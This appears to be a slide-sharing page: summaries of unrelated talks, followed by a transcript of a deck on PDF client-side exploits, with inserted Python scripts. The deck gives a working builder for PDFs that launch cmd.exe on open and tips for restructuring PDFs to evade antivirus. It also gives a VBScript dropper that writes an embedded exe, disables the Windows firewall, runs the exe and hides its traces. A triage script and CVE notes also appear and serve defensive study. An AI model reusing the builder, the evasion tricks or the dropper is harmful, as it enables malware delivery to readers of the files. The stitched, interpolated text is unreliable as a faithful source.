The document discusses various client-side exploits that can be performed using PDF files. It begins by providing background on PDFs and how their programming capabilities have led to security issues. It then examines different types of exploits such as launch actions, which can execute files or scripts when a PDF is opened, and AcroJS exploits using vulnerable JavaScript APIs. The document also covers obfuscation techniques used to evade antivirus and provides a case study of embedding an executable into a PDF to automatically execute it. In summary, it analyzes the threats posed by malicious PDFs that abuse the format's programming features to carry out exploits or unwanted code execution on a victim's system.
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit (Paula Januszkiewicz)
On December 6th Paula Januszkiewicz delivered a session at the Black Hat Europe 2017 conference held in London. She spoke about DPAPI and DPAPI-NG and CQURE's discovery in that matter.
Delivered as a plenary at USENIX LISA 2013. Video here: https://www.youtube.com/watch?v=nZfNehCzGdw and https://www.usenix.org/conference/lisa13/technical-sessions/plenary/gregg . "How did we ever analyze performance before Flame Graphs?" This new visualization invented by Brendan can help you quickly understand application and kernel performance, especially CPU usage, where stacks (call graphs) can be sampled and then visualized as an interactive flame graph. Flame Graphs are now used for a growing variety of targets: for applications and kernels on Linux, SmartOS, Mac OS X, and Windows; for languages including C, C++, node.js, ruby, and Lua; and in WebKit Web Inspector. This talk will explain them and provide use cases and new visualizations for other event types, including I/O, memory usage, and latency.
When does InnoDB lock a row? Multiple rows? Why would it lock a gap? How do transactions affect these scenarios? Locking is one of the more opaque features of MySQL, but it's very important for both developers and DBAs to understand if they want their applications to work with high performance and concurrency. This is a creative presentation to illustrate the scenarios for locking in InnoDB and make these scenarios easier to visualize. I'll cover: key locks, table locks, gap locks, shared locks, exclusive locks, intention locks, insert locks, auto-inc locks, and also conditions for deadlocks.
The document discusses the benefits of exercise for mental health. Regular physical activity can help reduce anxiety and depression and improve mood and cognitive function. Exercise causes chemical changes in the brain that may help protect against mental illness and improve symptoms for those who already suffer from conditions like anxiety and depression.
Recently our team researched various ntos subsystem attack vectors, and we will present one of the outputs in our talk. DeathNote is our internal code name for this component, which resides in the Microsoft Windows kernel, hiding behind different interfaces and exposed to the user in different ways.
What can go bad with it?
Basically two kinds of problems; one is syscall handling via direct user interaction. We will describe how to obtain a basic understanding of what's going on, how it interacts with other components and what its purpose is. With that knowledge we will dig deeper into how to make more complex fuzzing logic to cause enough chaos that will end up in unexpected behaviors in the Windows kernel, and demonstrate some of them.
And as for the second, as the title hints, this module does a bit of data parsing, so we will dive deep into the internals, pointing out some available materials, and move on to reverse engineered structures and internal mechanisms. We will show how some tricks can come out with various results, and how a structured approach can expose more problems than expected.
[Session given at Engage 2019, Brussels, 15 May 2019]
In this session, Tim Davis (Technical Director at The Turtle Partnership Ltd) takes you through the new Domino Query Language (DQL), how it works, and how to use it in LotusScript, in Java, and in the new domino-db Node.js module. Introduced in Domino 10, DQL provides a simple, efficient and powerful search facility for accessing Domino documents. Originally only used in the domino-db Node.js module, with 10.0.1 DQL also became available to both LotusScript and Java. This presentation will provide code examples in all three languages, ensuring you will come away with a good understanding of DQL and how to use it in your projects.
※ Download the file for a clearer copy of the material.
Explains an architecture in which hundreds of game servers handling 2 million concurrent users can be served with a minimal number of MySQL servers.
Shares high-performance, high-efficiency MySQL scaling techniques. That they have already been proven in a large-scale game service is no secret~
Contents
1. Basic architecture
2. A better architecture using ProxySQL
3. Final architecture
Target audience
- Anyone interested in experience using MySQL in large-scale game services
- Server developers or DBAs interested in ProxySQL
- Anyone who wants to configure the DB side flexibly during game server development
■ Related video: https://youtu.be/8Eb_n7JA1yA
This document summarizes a presentation about Amazon Aurora. It discusses how Aurora provides the speed and availability of commercial databases at a lower cost than open source databases. Aurora is a MySQL and PostgreSQL compatible database that is managed as a service, automating administrative tasks. It utilizes a distributed, self-healing storage system to provide high availability and durability across availability zones.
This document discusses various tools for monitoring and analyzing metaspace and class metadata in the Java virtual machine. It describes using -XX:+PrintGCDetails to print details of full GC collections including metaspace usage. It also discusses using MBeans, jstat -gc, and VisualVM to monitor memory pools like metaspace and class space. The document further explains using jmap -clstats to view statistics per class loader and GC.class_stats to view statistics on Java class metadata, which both require unlocking diagnostic VM options.
The document discusses Linux networking architecture. It first describes the basic structure and layers of the Linux networking stack, including the network device interface, network layer protocols like IP, the transport layer, and sockets. It then discusses how network packets are managed in Linux through the use of socket buffers and associated functions. The document also provides an overview of the data link layer and protocols like Ethernet and PPP, and how they are implemented in Linux.
This document discusses client-side exploits and tools used for testing them in a controlled network environment. It covers using Metasploit on Kali Linux to generate and encode a Meterpreter reverse TCP payload, deploying it on a Windows client virtual machine, and using Meterpreter post-exploitation commands to maintain access including disabling antivirus and establishing persistence. The goal is to achieve a low detection payload and compromise the client while evading detection, though the document notes that no method is foolproof and antivirus vendors adapt.
Testing web application firewalls (WAF) accuracy (Ory Segal)
This presentation discusses how to properly measure the accuracy of Web Application Firewalls. It explains the four attributes that must be measured (FP, FN, TP, TN) and how to properly calculate a WAF's accuracy from them.
The document discusses the evolving threat landscape in 2010. It covers several topics: (1) vulnerabilities and exploitation increased in 2010, with Microsoft and Adobe products being frequently targeted; (2) targeted attacks like Operation Aurora exploited zero-day vulnerabilities to infiltrate major companies; (3) cybercrime expanded through exploiting social networks to send spam and distribute malware. The document analyzes these trends through specific case studies and statistics from McAfee Labs.
The document discusses various client-side exploits that can be carried out using PDF files. It describes how launch actions, AcroJS (Adobe JavaScript), and embedded executables can be used to exploit vulnerabilities in PDF readers. Specific vulnerabilities and a proof-of-concept example using a hex-encoded executable embedded in comments are presented. The document also covers obfuscation techniques used to evade detection, such as modifying the PDF format and using JavaScript obfuscation.
The real incident of stealing a droid app+data (Akash Mahajan)
This is a beginner-level talk/lecture about how we managed to steal data, bypass security controls and steal the source code of an Android application which was supposed to be secure.
Technically what we managed to do isn't ground breaking, but due to a combination of reasons we were able to radically change the security of the Android app for the better.
The real incident of stealing android app data (Ankur Bhargava)
This is a beginner-level talk/lecture about how we managed to steal data, bypass security controls and steal the source code of an Android application which was supposed to be secure.
Technically what we managed to do isn't ground breaking, but due to a combination of reasons we were able to radically change the security of the Android app for the better.
Us 16-subverting apple-graphics_practical_approaches_to_remotely_gaining_root... (Liang Chen)
This document discusses techniques for remotely gaining root privileges on Apple devices by exploiting vulnerabilities in the graphics components. It provides an overview of Apple's graphics architecture and the allowed graphics interfaces for sandboxed processes. It then analyzes attack surfaces in the userland WindowServer and QuartzCore interfaces, describing vulnerabilities previously found that allowed escalating privileges or bypassing sandbox restrictions. Finally, it walks through the exploitation of a double free vulnerability (CVE-2016-1804) in the multi-touch handling that could be leveraged to achieve remote code execution with root privileges.
This document discusses router forensics and security. It provides an overview of routers and common router attacks. It outlines the process of performing router forensics, including collecting volatile data, investigating incidents, and documenting findings. The document also discusses why router resources need protection and why router forensics is important for addressing security issues, monitoring activity, and regulatory compliance.
This document summarizes security issues with JavaScript and discusses vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It provides examples of how XSS can be used to steal cookies and hijack sessions. It also discusses challenges with securing JSON responses and preventing code injection attacks. Countermeasures discussed include escaping output, adding random tokens to forms, and using a secure comment syntax to wrap sensitive JSON responses.
This document discusses hacking and securing iOS applications. It begins by covering iOS security concepts and loopholes, then discusses how those loopholes can affect apps and allow easy theft of app data. The remainder of the document provides guidance on how to protect apps by securing local storage locations, runtime analysis, and transport security. Key recommendations include encrypting sensitive data, using data protection APIs, restricting access to private data, and properly validating SSL certificates.
NCC Group 44Con Workshop: How to assess and secure iOS apps (NCC Group)
This document provides an overview of assessing and securing iOS apps. It discusses setting up a testing environment by jailbreaking an iOS device to gain root access. Various tools are installed to analyze apps, including intercepting network traffic both passively and by acting as an HTTP proxy gateway. The document also covers monitoring local app data, binaries, and runtime analysis for black-box security testing of iOS apps.
Alphorm.com course: Hacking and Security, the Essentials (Alphorm)
Link to the full course here:
http://www.alphorm.com/tutoriel/formation-en-ligne-hacking-et-securite-lessentiel
This course is an offensive approach to the practices and methodologies used by hackers when intruding into networks and applications. We emphasize the technical and practical understanding of the various existing forms of attack, focusing on the most critical vulnerabilities.
At the end of this course you will be able to carry out security audits (penetration tests) within your own infrastructure.
It is a complete course on the essentials you need in order to put on the hacker's hat in your vulnerability tests, and also for anyone who wants an offensive approach to IT security or wishes to acquire technical knowledge of attacks; you have to know how to attack in order to defend better.
The presentation of attack techniques and vulnerabilities is practice-oriented, within a penetration testing lab.
When most of the logic lives in JavaScript, the larger share of the security risks lives there too. Attackers find JavaScript an interesting new environment, because the language itself and its homes in the browser and Node.js bring many new problems. That is exactly where this talk starts: the surprising differences between JavaScript and other languages when it comes to security; the risks and peculiarities of browsers and other JavaScript engines such as Node.js; and the security implications of JavaScript frameworks, through to specific problems such as mXSS, ReDoS and HTML5 security.
This document discusses strategies for fuzzing complex file formats that contain multiple data types, encodings, and embedded files. It recommends separating fuzzing into modular components that focus on individual data types, encodings, and objects. This allows fuzzing ASCII, binary, images, fonts and other embedded objects independently before combining them back into a single test case in a manner similar to the complex file format. Taking this modular approach helps address issues like protocol awareness, code coverage, and handling multiple encoding levels within a single complex format.
Javascript, DOM, browsers and frameworks basics (Net7)
The DOM (Document Object Model) defines the logical structure of documents and how they can be accessed and manipulated. It was developed to promote cross-browser compatibility for JavaScript and other browser scripting languages. Early versions of JavaScript allowed basic access to HTML elements (DOM Level 0), while later versions enabled more advanced manipulation of CSS properties and document layers (Intermediate DOMs). The W3C brought together companies like Netscape and Microsoft to develop standards for ECMAScript and the DOM, with DOM Level 1 being finalized in 1998.
COURSE TITLE: SOFTWARE DEVELOPMENT VI
COURSE CODE: VIT 351
TOPICS COVERED:
FILES
FILES I/O STREAM
TYPES OF FILES
DRAWBACKS OF TRADITIONAL METHOD OF DATA STORAGE
CONCEPT OF BUFFER
MODES OF FILE OPENING
END OF FILE
PREPROCESSOR DIRECTIVES
MACROS
TYPES OF MACROS
DIFFERENCE BETWEEN MACROS AND FUNCTIONS
QUIZ SET 5
The document discusses file input and output in C programming. It explains that files are used to store large amounts of data permanently, unlike input/output functions that use terminals. The key file operations covered are opening, reading, writing, and closing files. It also describes common functions for file I/O like fopen(), fclose(), getc(), putc(), fprintf(), and fscanf(). Sample programs are provided to demonstrate reading from and writing to files.
This presentation demonstrates how the Mozilla Firefox platform could potentially be misused through malicious extensions or cross-context switching attacks. It discusses the modular and pluggable nature of Firefox extensions, and shows how extensions can be installed without review and gain full system privileges. The presentation then demonstrates attacks like keylogging, executing native code, and extracting passwords by building a malicious extension. It also explores techniques like cross-context switching and event handler attacks to subvert extension security. Developers are advised to follow security best practices to avoid these kinds of issues in their own extensions.
This document discusses analyzing malicious PDF files. It provides an overview of PDF file structure and common strings found in PDFs. Tools are presented for parsing and scanning PDFs like pdf-parser.py, pdfid.py and Peepdf. A demo is shown using these tools to analyze a sample PDF. Limitations of only scanning for strings are noted, and it is recommended to also use antivirus and online scanning services to more thoroughly check for malware in PDFs.
This document provides an introduction to file handling in Java. It discusses how file handling allows programs to permanently store output data by writing it to files on secondary storage devices like hard disks. It covers key concepts like input and output streams that represent the flow of data into and out of a program. It also discusses how to create, write to, read from, and delete files in Java using classes like File, FileWriter, FileReader and Scanner. Common file methods like getName(), getAbsolutePath(), exists() are also outlined.
Web Application Testing in Ruby (WATIR) is a testing framework for web applications. Since it is built on Ruby, it takes advantage of Ruby's object-oriented principles and makes regression/functional testing very simple. This presentation aims to introduce WATIR, assist with installing it, and walk through testing with a simple test case.
This document discusses file handling in C programming. It begins by explaining why files are useful for storing data permanently and how programs can read from and write to files. It then covers the basic file operations in C like opening, reading from, writing to, and closing files. Different file modes for opening files are described. Functions for reading and writing single characters and formatted data to files like fopen, fclose, getc, putc, fscanf, fprintf are explained with examples. The document also discusses lower level functions for reading and writing blocks of data like fread and fwrite along with an example. It concludes with exercises asking the reader to write programs that read and write data to files.
This document discusses Firefox extension development. It covers why Firefox is a good platform for extensions, including its performance, security, extensibility and more. It then provides an overview of the typical structure of a Firefox extension, the technologies involved like RDF, XUL, and JavaScript, and steps for creating a basic translator extension using the Add-on SDK, including deploying and packaging the extension.
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques] (Ismail Tasdelen)
The document discusses remote file inclusion (RFI) and local file inclusion (LFI) attacks and defenses. It provides examples of vulnerable code that allows RFI/LFI exploits by directly using unsanitized user input. It then demonstrates how to conduct RFI/LFI attacks to view files or execute commands on the server. Finally, it recommends sanitizing user input with functions like strip_tags(), htmlspecialchars(), and providing one's own cleaning function to prevent RFI/LFI exploits.
WPF provides access to 2D and 3D graphics, controls, and rich document viewing with a consistent programming model. It uses hardware acceleration for improved visual rendering. Key benefits include broad integration, resolution independence, and declarative programming using XAML. The core WPF assemblies include PresentationFramework, PresentationCore, and WindowsBase. The Application class manages the lifetime of a WPF application, while the Window class represents individual windows. Controls such as buttons, text boxes, and containers are used to build the user interface.
The document discusses a new approach to generating DOCX, DOC, and PDF files using templates with the Zend Framework 2. It introduces LiveDocx, a SOAP-based document generation service with a PHP API called ZendService_LiveDocx. The template approach allows merging data into document templates to generate files in multiple formats like DOCX, DOC, HTML, RTF, PDF, and TXT with three simple steps: creating a template, populating merge fields with data, and writing the generated document to disk. Examples and demonstrations are provided.
The document provides an overview of various technologies used in iPhone applications, including checking internet connectivity, using SQLite database, getting current location with Core Location, parsing JSON, implementing in-app purchases, enabling AirPlay and wireless printing capabilities. It discusses relevant frameworks, classes, and code snippets.
The document discusses strategies for cybersecurity defenses against attacks. It notes that while attackers may seem powerful, they are actually constrained by resources and need vulnerabilities to exploit. It recommends techniques like hardening systems, applying patches, minimizing exposed software, using endpoint detection systems, and pretending to be in a malware analysis environment to discourage attacks. The overall message is that simple changes can make a system much harder to attack than the typical unmodified configuration that attackers rely on.
Building Desktop RIAs with PHP, HTML & Javascript in AIR (funkatron)
This document discusses building desktop applications with Adobe AIR using web technologies like PHP, HTML, and JavaScript. It provides an overview of AIR and its architecture, which allows building desktop apps using these web technologies. It also discusses using JavaScript in AIR applications and some JavaScript frameworks that work well, with an emphasis on jQuery. It then discusses using PHP as the server-side language to work with AIR applications, providing some examples of using PHP and JSON for asynchronous calls and file uploading.
This document discusses security issues and vulnerabilities in the iOS operating system. It begins with an overview of the iOS hardware and software architecture, including the security features like sandboxing and code signing. It then explains what a jailbreak is and how it attacks the chain of trust to bypass these protections. The document outlines several ways sensitive data can be accessed, such as through property lists, SQLite databases, keychains, logs, and cached files. It also discusses client-side vulnerabilities like SQL injection, XSS, and logging of sensitive information. Finally, it promotes learning about mobile security through tools like OWASP iGoat and the speaker's company AppKnox.
3. About PDF
• What is PDF?
• Incidents in the wild
• Why PDF attacks?
• PDF document structure
4. Potentially Dangerous File / Penetration Document Format
Stands for Adobe Portable Document Format
Exchange and manipulation of electronic data, reliable and platform independent
Has become the most widespread and most used document description format throughout the world
5. Adobe PDF – As a programming language
A PDF document is more than a powerful document format:
it has a complete programming language of its own, dedicated to document creation and manipulation, with relatively strong execution features.
9. Incidents in the wild
Targeted e-mails carrying PDF exploits, by date, CVE and lure subject:
Jun 14  CVE-2010-1297  PDF  Adobe 0-day, "WEO" from sacchetti.dana@gmail.com
Jun 20  CVE-2010-1297  PDF  "Meeting agenda" from alexis.mo88@gmail.com
Jun 21  CVE-2010-1297  PDF  "About the recent US-Japan Economic Relations"
Jun 21  CVE-2010-1297  PDF  Adobe 0-day, "About the recent US-Japan Economic Relations" - with Poison Ivy
Jun 27  CVE-2009-0927  PDF  "Discussion on cross-strait maritime cooperation"
Jul 6   CVE-2010-1297  PDF  "EPA's Water Sampling Report" from spoofed OCSPP@epa.go
Jul 14  CVE-2009-4324  PDF  "President Obama's Detrimental Deadlines"
10. The Reign of Zeus
Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.
It was found in July 2007, when it was used to steal information from the United States Department of Transportation, and became more widespread in March 2009.
In June 2009, the security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies such as Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon and BusinessWeek.
ZeuS is sold in the criminal underground as a kit for around $3000-$4000, and is likely the single piece of malware most used by criminals specialising in financial fraud. ZeuS has evolved over time and includes a full arsenal of information-stealing capabilities.
11. The Reign of Zeus
A recent breakthrough in spreading Zeus via PDF files threatens to further its spread. The PDF file (detected as Exploit.JS.Pdfka.bui) contained an exploit for the CVE-2010-0188 vulnerability, a buffer overflow that manifests itself when the field containing the image is accessed.
CVE-2010-0188 exploit statistics, 2010 (chart not reproduced in this transcript)
13. Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass
VUPEN ID - VUPEN/ADV-2010-1992
Release date - 2010-08-03
It is caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari.
14. Why PDF
Popularity and usability
Flexibility, platform independence, rich text
Trust level is high: a PDF is perceived as a static piece of information
Rich API, easy to exploit / misuse
Dominance of Adobe Reader: one target, huge scope for attack
15. PDF document structure
The general structure of a PDF file is composed of the following components: header, body, cross-reference (xref) table, and trailer, as shown in figure 1.
17. Launch Action
• Launch Action API
• Some examples
• Evading antivirus
• With embedded EXE
18. Launch Action Vulnerability
A launch action launches an application or opens or prints a document. The following are the action dictionary entries specific to this type of action.
ENTRIES
S : name
(Required) The type of action that this dictionary describes; shall be Launch for a launch action.
F : file specification
(Required if none of the entries Win, Mac, or Unix is present) The application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.
Win : dictionary
(Optional) A dictionary containing Windows-specific launch parameters.
19. Launch Action Vulnerability
PARAMETERS (entries of the Win dictionary)
F : byte string
(Required) The file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (\), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.
P : byte string
(Optional) A parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.
The security-relevant entry is P: it is an arbitrary command line handed to whatever F names, so a document can name cmd.exe in F and put an attacker-chosen argument string in P.
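As an added example (not code from the deck), the following Python script writes a minimal PDF with exactly the structure described on slide 15 (header, body, xref table, trailer) and installs a /Launch action as the catalog's /OpenAction, using the /Win sub-dictionary with the /F and /P entries just listed; it also produces the /JavaScript action form that the deck covers later under AcroJS. The launched program and parameter string are placeholders of this example's own choosing, not values from the deck. A check function confirms that every xref offset points at its object, which is the detail hand-built files most often get wrong.

```python
"""Minimal PDF with a /Launch (or /JavaScript) /OpenAction.

Added example; not the deck's code. The launch target below is a placeholder.
"""
import re


def pdf_escape(s: bytes) -> bytes:
    """Escape a byte string for use inside a PDF literal string (...).
    Backslash and parentheses are the only characters that must be escaped."""
    return s.replace(b"\\", b"\\\\").replace(b"(", b"\\(").replace(b")", b"\\)")


def launch_action(program: bytes, params: bytes = b"") -> bytes:
    """Launch action dictionary: /S /Launch with Windows-specific /Win entries.
    /F names the program (or document); /P is the parameter string passed to it."""
    win = b"/F (" + pdf_escape(program) + b")"
    if params:
        win += b" /P (" + pdf_escape(params) + b")"
    return b"<< /Type /Action /S /Launch /Win << " + win + b" >> >>"


def javascript_action(script: bytes) -> bytes:
    """JavaScript action dictionary: /S /JavaScript with the script in /JS."""
    return b"<< /Type /Action /S /JavaScript /JS (" + pdf_escape(script) + b") >>"


def build_pdf(action: bytes) -> bytes:
    """Assemble header, body (three objects), xref table and trailer.
    The catalog's /OpenAction points at object 3, which holds `action`."""
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",   # an empty page tree is enough
        action,
    ]
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))                  # byte offset of "N 0 obj"
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    xref_pos = len(out)
    out += b"xref\n0 %d\n" % (len(objects) + 1)
    out += b"0000000000 65535 f \n"               # entry 0: head of the free list
    for off in offsets:
        out += b"%010d 00000 n \n" % off          # each entry is exactly 20 bytes
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\n" % (len(objects) + 1)
    out += b"startxref\n%d\n%%%%EOF\n" % xref_pos  # %%%% renders as %%
    return bytes(out)


def check_xref(pdf: bytes) -> bool:
    """True if startxref locates the table and every in-use entry points
    exactly at 'N 0 obj' for its object number."""
    m = re.search(rb"startxref\s+(\d+)", pdf)
    if not m:
        return False
    start = int(m.group(1))
    if pdf[start:start + 4] != b"xref":
        return False
    entries = re.findall(rb"(\d{10}) \d{5} ([nf])", pdf[start:])
    for num, (off, kind) in enumerate(entries):
        if kind == b"n" and not pdf[int(off):].startswith(b"%d 0 obj" % num):
            return False
    return True


def demo_launch_pdf() -> bytes:
    # Placeholder target (this example's choice): cmd.exe echoing a marker.
    return build_pdf(launch_action(b"cmd.exe", b"/c echo launch action fired"))


if __name__ == "__main__":
    pdf = demo_launch_pdf()
    assert check_xref(pdf)
    with open("launch_poc.pdf", "wb") as fh:
        fh.write(pdf)
    print(pdf.decode("latin-1"))
```

Run it and open the file in the reader configuration under test: whether the launch prompt appears, and what it displays, is exactly the behaviour the mitigation slide's "non-PDF file attachments" setting controls. Because the check runs before the file is written, a malformed xref is caught rather than silently tolerated by a lenient reader.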
28. Evading Antivirus by Changing the format
You can take any other PDF data type and give it a number by wrapping it in "obj" and "endobj". Then later on, when you want to use that chunk of data, you can reference it, by number, with the "R" operator. Acrobat treats these two examples as equivalent, but a signature that looks for the literal value inside the dictionary only matches the second:
2 0 obj
(Hello World)
endobj
3 0 obj
<<
/Example 2 0 R
>>
endobj

3 0 obj
<<
/Example (Hello World)
>>
endobj
29. Evading Antivirus
What you can leave out:
All page data
All whitespace, except for the end-of-line after comments
The version number part of %PDF-1.1
The %%EOF
The xref table, and thus also startxref
Most object /Types
So what's actually required?
%PDF-anything, but if the file is too confusing for Acrobat you need at least the first number, like %PDF-1.
A trailer with a /Root dictionary for the Catalog
A /Pages dictionary, but this can be empty, just as long as it is a dictionary type
An /OpenAction if you want to launch your JavaScript upon file open
The JavaScript action
32. POC: Launching an Embedded exe
Step 1: Embed the hex content of the exe in a VBScript which extracts it out to the file system and runs it.
Step 2: Embed that VBScript in the PDF file as comments.
Step 3: Launch cmd.exe (via the launch action) and create another script which extracts the main VBScript out of the PDF and runs them both.
33. Step 1 : Embed the hex content of the exe in a vbscript
Dim b,bl
Function c(d)
  c=chr(d)
End Function
' Hex content of the exe as a character array (the DOS header "MZ" is 77 90 144 0 ...)
b=Array(c(77),c(90),c(144),c(0),c(3),c(0),c(0)....,"")
bl = 3072
' Write the bytes back out as helpme.exe
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("helpme.exe", 2, True)
For i = 0 To bl
  f.write(b(i))
Next
f.close()
' Disable the Windows firewall, run the dropped binary, then kill the cmd.exe that launched us
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "netsh firewall set opmode disable", 0, True
WshShell.Run "helpme.exe", 0, False
WshShell.Run "taskkill /IM cmd.exe /F", 0, False
34. Step 2 : Embed the vbscript in the pdf file as comments
The script is flattened onto one line, with statements separated by ";", and placed between two marker comments, %'SS and %'EE, so the PDF parser ignores it:
%'SS
%Dim b,bl;Function c(d);c=chr(d);End Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso = CreateObject("Scripting.FileSystemObject");Set f = fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To bl;f.write(b(i));Next;f.close();Set WshShell = WScript.CreateObject("WScript.Shell");WshShell.Run "netsh firewall set opmode disable", 0, True;WshShell.Run "helpme.exe", 0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False
%'EE
6 0 obj
[/PDF /Text]
endobj
36. Generated VBScript
' Carve the payload script back out of the PDF (between the 'SS and 'EE markers),
' strip the "%" comment prefixes, restore the line breaks and write it to disk.
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("toexecute.vbs", 2, True)
s = Replace(s,"%","")
s = Replace(s,";",vbcrlf)
z.Write(s)
z.Close()
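Tying slides 28, 29 and 32-34 together, here is an added triage script (this example's own, not the deck's) that does what a signature scanner trusting the file's structure cannot: it enumerates objects by scanning for obj/endobj instead of reading the xref (which slide 29 says may be absent), undoes #xx name escapes so /L#61unch is recognised as /Launch, follows N 0 R references so an /OpenAction parked in another object is still inspected, and flags comment lines that carry script-like payloads the way the PoC does. The sample file at the bottom is constructed for the example, and the keyword and marker lists are this example's choices.

```python
"""Structure-independent triage of a PDF for launch/JS triggers.

Added example, not the deck's code. Keyword lists are this example's choices.
"""
import re

TRIGGERS = (b"/OpenAction", b"/AA", b"/Launch", b"/JavaScript", b"/JS",
            b"/EmbeddedFile", b"/RichMedia")
COMMENT_MARKERS = (b"CreateObject", b"WScript", b"cmd.exe", b"powershell")

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.S)
REF_RE = re.compile(rb"(\d+)\s+(\d+)\s+R")


def normalize_names(data: bytes) -> bytes:
    """Undo #xx escapes in names so /L#61unch compares equal to /Launch.
    (Applied to whole bodies: strings may change too, which is fine for triage.)"""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def parse_objects(pdf: bytes) -> dict:
    """Map object number -> body by scanning for 'N G obj ... endobj'.
    No xref needed; a later redefinition of the same number wins, as it
    would in an incremental update."""
    objs = {}
    for num, _gen, body in OBJ_RE.findall(pdf):
        objs[int(num)] = normalize_names(body)
    return objs


def resolve(objs: dict, value: bytes, depth: int = 0) -> bytes:
    """Follow 'N G R' indirections (bounded, to survive reference loops)."""
    m = REF_RE.fullmatch(value.strip())
    if m and depth < 8 and int(m.group(1)) in objs:
        return resolve(objs, objs[int(m.group(1))], depth + 1)
    return value


def open_action(objs: dict) -> bytes:
    """Return the /OpenAction value, dereferenced if it is indirect."""
    for body in objs.values():
        m = re.search(rb"/OpenAction\s*(\d+\s+\d+\s+R|<<.*)", body, re.S)
        if m:
            return resolve(objs, m.group(1))
    return b""


def suspicious_comments(pdf: bytes) -> list:
    """Comment lines are ignored by the reader, which is why the PoC hides a
    VBScript in them: flag very long ones or ones naming scripting objects."""
    return [line[:60] for line in pdf.splitlines()
            if line.startswith(b"%") and
            (len(line) > 200 or any(k in line for k in COMMENT_MARKERS))]


def triage(pdf: bytes) -> dict:
    objs = parse_objects(pdf)
    action = open_action(objs)
    kind = re.search(rb"/S\s*/(\w+)", action)
    norm = normalize_names(pdf)
    return {
        "objects": len(objs),
        "has_xref": b"xref" in pdf,
        "triggers": sorted(t.decode() for t in TRIGGERS if t in norm),
        "open_action_type": kind.group(1).decode() if kind else None,
        "comment_payloads": len(suspicious_comments(pdf)),
    }


# Constructed sample: no xref, hex-escaped /Launch, indirect /OpenAction,
# and a marker-delimited comment payload in the style of the PoC.
SAMPLE = b"""%PDF-1.
%'SS
%Set fso=CreateObject("Scripting.FileSystemObject"):WScript.Echo "payload"
%'EE
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj 4 0 R endobj
4 0 obj << /Type /Action /S /L#61unch /Win << /F (cmd.exe) >> >> endobj
trailer << /Root 1 0 R >>
"""

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

The point of the sample is that a naive grep for "/Launch" finds nothing, the xref is missing, and the catalog's /OpenAction value is just "3 0 R"; the script still reports an open action of type Launch. Real files add stream filters on top of this, which the filter decoder later in the deck's obfuscation section has to handle separately.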
38. AcroJS
• Acrobat JavaScript is the cross-platform scripting language of the Adobe® Acrobat® family of products.
• Through JavaScript extensions, the viewer application and its plug-ins expose much of their functionality to document authors, form designers, and plug-in developers.
• This functionality includes the following features:
  – Processing forms within the document
  – Batch processing collections of PDF documents
  – Developing and maintaining online collaboration schemes
  – Communicating with local databases
  – Controlling multimedia events
39. JavaScript Actions
• A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter.
• Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual appearances.
PARAMETERS
/S
Type - name
(Required) The type of action that this dictionary describes; must be JavaScript for a JavaScript action.
/JS
Type - text string or text stream
(Required) A text string or text stream containing the JavaScript script to be executed.
The stream form is the one that matters for evasion: a /JS stream can be wrapped in any of the filters discussed under PDF obfuscation, so the script never appears in the file as plaintext.
43. Vulnerable APIs
• Collab.getIcon() [CVE-2009-0927]
  – Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
• util.printf() [CVE-2008-2992] [CVE-2008-1104]
  – Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.
  – Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.
44. Vulnerable APIs
• getAnnots() [CVE-2009-1492]
  – The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.
• customDictionaryOpen() [CVE-2009-1493]
